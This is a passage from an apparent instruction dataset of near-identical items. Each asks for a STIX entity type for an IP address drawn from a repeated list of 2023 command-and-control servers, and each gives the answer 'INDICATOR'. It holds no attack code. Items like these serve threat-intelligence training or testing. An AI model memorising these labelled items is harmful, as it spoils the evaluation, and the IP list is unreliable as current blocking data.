31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.190.31\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n216.128.140.45\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n206.189.154.168\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n149.28.130.189\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n78.141.239.24\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
